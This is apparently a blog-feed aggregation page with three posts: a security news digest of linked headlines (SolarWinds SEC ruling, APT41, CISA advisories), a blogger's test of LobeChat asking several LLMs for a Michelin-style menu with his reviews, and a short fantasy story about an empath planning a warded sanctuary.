⚖️ Judge dismisses much of SEC suit against SolarWinds over cybersecurity disclosures security news – U.S. Judge dismissed most SEC claims against SolarWinds related to cybersecurity disclosures regarding the Sunburst attack. The ruling is seen as a victory for industry officials and a setback for SEC in holding executives accountable. https://cyberscoop.com/judge-dismisses-much-of-sec-suit-against-solarwinds-over-cybersecurity-disclosures/

🤒 APT41 Has Arisen From the DUST security research – APT41, in collaboration with Google's TAG, launched a campaign targeting various sectors across multiple countries, using techniques like web shells, backdoors, SQL export, and OneDrive exfiltration. https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/

🧑‍🏭 CISA publishes resilience-planning playbook for critical infrastructure cyber defense – CISA releases playbook for infrastructure resilience planning, aiming to enhance security and minimize impact of cyberattacks on critical infrastructure. https://statescoop.com/cisa-cybersecurity-resilience-planning-playbook-critical-infrastructure/

🔒 Cisco fixed a critical flaw in Security Email Gateway that could allow attackers to add root users vulnerability – Cisco fixed a critical vulnerability in Secure Email Gateway allowing attackers to add root users and crash SEG appliances. https://securityaffairs.com/165905/uncategorized/cisco-fixed-a-critical-flaw-in-security-email-gateway-that-could-allow-attackers-to-add-root-users.html

🖲️ Attacking Connection Tracking Frameworks as used by Virtual Private Networks security research – Study demonstrates successful attacks on VPN connection tracking frameworks, highlighting vulnerabilities and proposing mitigations for enhanced security and privacy. https://petsymposium.org/popets/2024/popets-2024-0070.pdf


CISA Corner

KEV – Adobe, SolarWinds, VMware, OSGeo https://www.cisa.gov/news-events/alerts/2024/07/15/cisa-adds-one-known-exploited-vulnerability-catalog https://www.cisa.gov/news-events/alerts/2024/07/17/cisa-adds-three-known-exploited-vulnerabilities-catalog

security updates – Cisco, Ivanti, Oracle https://www.cisa.gov/news-events/alerts/2024/07/18/cisco-releases-security-updates-multiple-products https://www.cisa.gov/news-events/alerts/2024/07/18/ivanti-releases-security-updates-endpoint-manager https://www.cisa.gov/news-events/alerts/2024/07/18/oracle-releases-critical-patch-update-advisory-july-2024

industrial – Rockwell, Subnet, Philips, Mitsubishi https://www.cisa.gov/news-events/ics-advisories/icsa-24-198-01 https://www.cisa.gov/news-events/ics-advisories/icsa-24-200-02 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-200-01 https://www.cisa.gov/news-events/ics-advisories/icsa-24-200-01


While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun... Most of the articles are in English, but some current warnings might be in German.


from Kevin Neely's Security Notes

Creating a Michelin menu with Generative AI

We've been watching season three of The Bear and it is totally nuts, filled with drama and psychology, and human relationships, and –when they can get around to it– cooking food. This is a fantastic series, and as foodies, you can imagine that my wife and I really enjoy it. The series is intense, following a classically trained chef at the top of his game as he “drops down” from a fancy restaurant to a steak sandwich shop and works back toward where he was before.

That’s not a spoiler, it’s the premise. And this isn’t a review, it was just something in my mind as I experimented with this new tool called LobeChat, which is an interface to #genAI inference servers such as #OpenAI’s #chatGPT, #Claude, and nearly any other commercial or #opensource system you can imagine. I'm tweaking a #homelab hosted genAI inference server and this post is about experimenting with Ollama and a LobeChat front end for easy access. I haven’t formed a final opinion on this setup at this time, but the #LobeChat front end allows for quick switching between inference servers and their hosted models. While not super easy to configure, once it works, the whole thing looks very easy for someone, i.e. a roommate or a spouse, to flip between models, even in the same conversation.

So let’s look at some results. Of course, the results are about the models themselves, but the point here is that LobeChat made it easy to switch between them as I continued to develop the conversation.

First prompt

This was with ChatGPT (4o, I think). I needed something to test that an integration was working. We had just watched The Bear so this is what I came up with:

as fast as you can, what's the best restaurant dinner menu with wine pairing that could win a Michelin 3 star award?

Response

Crafting a Michelin 3-star worthy dinner menu with wine pairings involves high-quality ingredients, exquisite preparation, and a thoughtful combination of flavors. Here’s a conceptual menu that could impress:

Amuse-Bouche: Oyster with Champagne Foam
Wine Pairing: Champagne Brut

Appetizer: Seared Scallops with Cauliflower Puree and Caviar
Wine Pairing: Chablis, Premier Cru

Soup: Cream of White Asparagus with Truffle Oil
Wine Pairing: Viognier

Fish Course: Poached Turbot with Fennel and Citrus Beurre Blanc
Wine Pairing: Pouilly-Fumé

Main Course: Roasted Duck Breast with Plum Sauce, Parsnip Mash, and Seasonal Vegetables
Wine Pairing: Pinot Noir, preferably from Burgundy

Cheese Course: A Selection of Artisan Cheeses with Honeycomb
Wine Pairing: Vintage Port

Dessert: Chocolate Lava Cake with Raspberry Coulis and Homemade Vanilla Bean Ice Cream
Wine Pairing: Recioto della Valpolicella

Mignardises: Petit Fours and Truffles

This menu balances rich flavors with delicate preparation, offering a progression of dishes that showcase both technique and creativity. Each wine pairing is chosen to enhance the flavors of the dishes, aiming to create a harmonious dining experience that could captivate both critics and diners alike.

Review

Not a bad first response, especially since I was just checking to see if the system worked.

Prompt 2: Get ChatGPT to refine it

That was pretty boring. I’m thinking early 90s fancy dining at best, but I wasn’t eating fancy back then and assume it was all shoulder pads, tuna steaks, and cocaine. Continuing with ChatGPT, I posed the following in an attempt to refine our menu (in retrospect, I was generous with the stars):

That's an incredibly boring menu. At best 2 stars. And that's in a region that is not known for its gastronomical excellence

Response

Creating a truly innovative and Michelin 3-star worthy menu certainly demands a more avant-garde approach, pushing culinary boundaries with unique combinations and exceptional techniques. Let's elevate the original concept to something more daring and creative:

Amuse-Bouche: Nitro-frozen Lime and Ginger Pearls with Micro Basil
Wine Pairing: Small-batch Sake

First Course: King Crab Tartare with Avocado Mousse, Mango Gel, and Edible Flowers
Wine Pairing: Albariño

Second Course: Foie Gras Au Torchon with Saffron Pear Compote and Brioche Crisp
Wine Pairing: Sauternes

Fish Course: Butter-Poached Monkfish with Leek Ash, Sea Beans, and a Lemon Verbena Emulsion
Wine Pairing: White Burgundy

Intermezzo: Cucumber and Elderflower Sorbet

Main Course: Sous-vide Venison Loin with Black Garlic Purée, Wild Mushrooms, and a Juniper Berry Reduction
Wine Pairing: Barolo

Cheese Course: A Selection of Aged Cheeses with a Fig and Walnut Tapenade
Wine Pairing: Aged Madeira

Dessert: Deconstructed Passion Fruit Tart with Coconut Foam, Crystallized Ginger, and Meringue Shards
Wine Pairing: Late Harvest Riesling

Petit Fours: Matcha Green Tea Macarons, Raspberry Pâte de Fruit

This revised menu introduces more complex techniques and unusual ingredients, aiming to surprise and delight with every course. Wine pairings are carefully selected to complement and enhance these adventurous flavors, providing a sophisticated and memorable dining experience.

Review

Not bad! It would be nice if the wines were more than broad regions; however, I do appreciate the ‘ñ’ in Albariño. There’s nothing particularly innovative here; the fancy-sounding “Foie Gras Au Torchon with Saffron Pear Compote and Brioche Crisp” is a Thomas Keller recipe, so at least we’re pulling from the top now that I asked it to up its game.

Prompt 3: Let's try a different model

Not only am I using a different model at this point, llama3:instruct, but I am going to specify a food critic in order to change the menu.

Prompt

One more try: let's make a menu that would knock even James Beard out of his chair because it's so good

Response

You are absolutely right! That menu, while technically sound, lacks the daring, innovation, and personal touch needed to truly impress Michelin inspectors and earn those coveted three stars. It plays it too safe, relying on classic pairings and predictable dishes.

To push towards that 3-star level, we need to think outside the box:

  • Ingredient Focus: Instead of “seasonal vegetables,” source hyper-local, unique produce with a story. Maybe a heirloom tomato variety grown in volcanic soil, or foraged mushrooms with a distinct flavor profile.
  • Deconstruction & Fusion: Take classic elements and reimagine them. A deconstructed apple pie might involve caramelized apple spheres, crumble as a powder, and a cider foam. Fusion could bring Japanese umami to the duck dish, or Indian spices to the scallops.
  • Unexpected Textures: Play with contrasts – crunchy, creamy, smooth, airy. Think smoked paprika meringue alongside the chocolate lava cake, or a black truffle “soil” under the turbot.

Wine Pairings Should Be Equally Bold:

  • Instead of a basic Chablis, consider an obscure producer from the Côte de Beaune known for mineral-driven wines.
  • The Pinot Noir could be a lesser-known region with unique terroir, like Slovenia's Primorska.
  • Experiment with natural wines, or even sake pairings that complement specific dishes.

The Presentation Matters:

Plating should be artistic, telling a story through the arrangement of colors, textures, and shapes. It’s about creating an immersive experience for the diner.

A Michelin-worthy menu isn't just about taste; it's about pushing boundaries, showcasing creativity, and offering a truly unforgettable journey through flavor.

Review

This is less of a menu than some advice for the aspiring chef. Let’s try something different.

Prompt 4: Let's go for Three Stars!

I felt like this was the time to go for the gusto. Let's see how a different model would respond, but also with all the history behind it.

Prompt

I asked:

> One more try: let's make a menu that would knock even James Beard out of his chair because it's so good

While it's not a crazily innovative menu, it has some classic touches of what an American, Michelin-starred menu would look like, and

Response with gemma2

You want to blow James Beard away? This isn't about ingredients, it's about experience.

The Menu: A Symphony in Five Acts

  • Act I: Awakening – Smoked Salmon “Caviar” with Beetroot Foam, Rye Crisp, and a single drop of Ossetra Caviar.

    • Pairing: Dry Riesling from Germany's Mosel Valley, expressing its slate minerality alongside the salmon's richness.
  • Act II: Earth & Sky – Roasted Quail “Confit” with Black Truffle Jus, Heirloom Carrot “Clouds,” and a dusting of Micro Thyme.

    • Pairing: Oregon Pinot Noir, showcasing earthy notes that harmonize with the truffle while its bright acidity cuts through the richness.
  • Act III: Fire's Dance – Charred Octopus with Smoked Paprika Aioli, Caramelized Onion Jam, and a drizzle of Chili Infused Olive Oil.

    • Pairing: Spanish Albariño, crisp and mineral-driven, its citrus notes complementing the octopus while balancing the smoky paprika.
  • Act IV: Ocean's Bounty – Pan-Seared Sea Scallops with Saffron Risotto “Foam,” Dulse Crisp, and a single Pearl Oyster.

    • Pairing: Chablis Premier Cru, its intense minerality mirroring the scallops' brininess, while subtle citrus notes elevate the saffron risotto.
  • Act V: Sweet Serenade – Deconstructed Peach Cobbler with Lavender Honey Ice Cream, Toasted Almond Brittle, and a hint of Rosemary Extract.

    • Pairing: Late Harvest Gewürztraminer from Alsace, its floral aroma echoing the lavender, while its sweetness complements the peach cobbler's richness.

The Experience:

  • Each course is plated as a miniature work of art, using contrasting colors, textures, and temperatures.
  • The dining room itself is a sensory experience, with soft lighting, calming music, and subtle aromas that enhance each dish.
  • Service is impeccable, with knowledgeable staff guiding guests through the tasting menu and explaining the inspiration behind each course.

This is not just food; it's a journey for the senses, a story told through flavor and texture, leaving James Beard speechless (and perhaps, slightly envious).

Review

Wow, what a different response! This one could actually be a menu, with the wines having robust and specific descriptions. I especially like how the wines are sourced from all over the globe, really picking best of breed in the selections. As good as the wines are, however, the food does not look 3-star level to me. The dishes sound really nice, and there’s a fair bit of molecular gastronomy in there. However, aside from the poetic nature of the menu, I’m not sure this is a top-tier menu for a chef to execute.

Still, most of these items are good enough for a fake restaurant. If this was to show up in a video game or a novel, I think most people would accept it and move on.


from Psychomancer

“I can already tell it wasn't good news,” Peter said, obviously reading my down-turned eyes and lack of smile, perhaps the color of my cheeks. “Usually, when you come back, you're bubbly,” he added. “But you look like you are about to tell me my cat has cancer.” Peter was plump, like me, with the hint of an East Coast accent and constant twinkle in his eyes. He was also invisible when looking The Other Way. Not just to me, but to everyone and everything. As an empath, having a friend I cannot read is delightful. And he was right, it wasn't good news, but not all bad, either. He leads the way, in silence, to my study where light refreshments are waiting. We sit side-by-side on the antique sofa, where I've often slipped from my body into the æther. But the trip I just took required a more controlled and thoughtful environment. I grip Peter's hand, “They showed me quite a bit.” “Was Saffron there?” he asks. I snicker, “Why do you call her that?” He shrugs, “'Saffron' seems to match her essence and I can't pronounce a string of animated, hyper-dimensional ideograms.” “Yes,” I say. “She was waiting for me at the Carnival.” I take a deep breath and exhale slowly. “Do you want the bottom line or the whole story?” I ask. Peter just raises an eyebrow. “'Whole story' it is, then.”

The sky was a kaleidoscope of pinks, purples, and colors I can't describe, rotating, folding, emerging. It's always breathtaking. But they created the Carnival for me to have a familiar place to walk, to anchor my perception. They know me and treat me with some level of respect afforded to those who pass their tests. She knew why I was there. They always know. She was shorter than me, humanoid but shaped like a bowling ball with pale / grey / ashen / luminescent skin and blue / black / red hair in a pony tail / pixie cut. She gave me cotton candy flavored like dreams. “You must / will ask / plead / already know,” she said. “How can we stop it? How can we save ourselves from the hatred fueling the move toward authoritarian fascism?” I asked. “You cannot / will not / must not / could never / not your fault,” she told me. With a gesture, she showed me how far back it goes, how helpless we are against the sins of our ancestors and our descendants. The flood of information, pictures, sounds, words, entire histories was far too much for a human mind to comprehend. But I've been here enough times to know the rules are different. I was able to “slow it down” and comprehend what she was telling me. The world we live in is based on slavery, colonization, conquest, manufactured inequality, and brutality. She showed me versions of earth where there was no Inquisition, no Alexander the Great, no Genghis Khan, no British expansion, no slavery, no extermination of natives, no treating one human as less than another for reasons beyond their control. Thousands of variations. Millions of possibilities. They created worlds unrecognizable. Certainly you and I did not exist, but neither did the countries we know, the languages, the technology. They were so far removed from here as to be fantasy. And they were the only worlds that did not succumb to this culmination of hatred. She showed me as far back as the founding of the United States that it was already too late. 
All we can do is shift the timeline. There are some things mankind must experience so that we do not forget what we are capable of.

“I'm sure that's not where she left it,” Peter interrupts. “They don't do that.” I nod, “True, but it's not much better.” “I have privileges. The privilege of generational wealth, the color of my skin, a home that is paid for, the ability to see other people's truths before they do.” I squeeze Peter's hand, “Friends I can trust and lean on.” “Being an out lesbian pagan puts me at risk, but I can protect myself,” I say, adding only in thought, “for now.” I lower my head, “She suggested I bolster our defenses and, along with everyone else, experience humanity seeing itself as it really is.” “She said we must acknowledge and confront what we are in order to become what we might be.” “She reminded me that I have been spared the violence that murders and marginalizes people for their gender or the color of their skin or the deity they worship or any uncontrollable circumstance of their birth. I have been immune to the violence inflicted on others for not being male and heterosexual because of my privileges.” I turn and hold both Peter's hands. He can see the change on my face because he smiles and nods for me to continue. He knows I have a plan. “I want to work with Doug and Eric, even Emma and Eunice to turn our shared acreage into an official sanctuary, fully warded and protected. We'd need your expertise with runes, obviously.” Peter chuckles, “If we can't save everyone, we'll save who we can?” “For starters,” I say, grinning. Peter squints and I can tell he's working it out, thinking about the specific connections, knowledge, skills, talents, and resources of each of my neighbors. The psychedelic techbro, the lycanthrope luddite, the conspiracy theorist empath, the bitter faeries living in my garden, the sacred space we all maintain and respect. “We're gonna organize a resistance,” he says flatly. I'm beaming, slowly nodding, “We are going to organize a resistance.”


#Psychomancer #Writing #ShortFiction #Writer #Writers #WritersOfMastodon


CC BY-NC-SA 4.0 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License
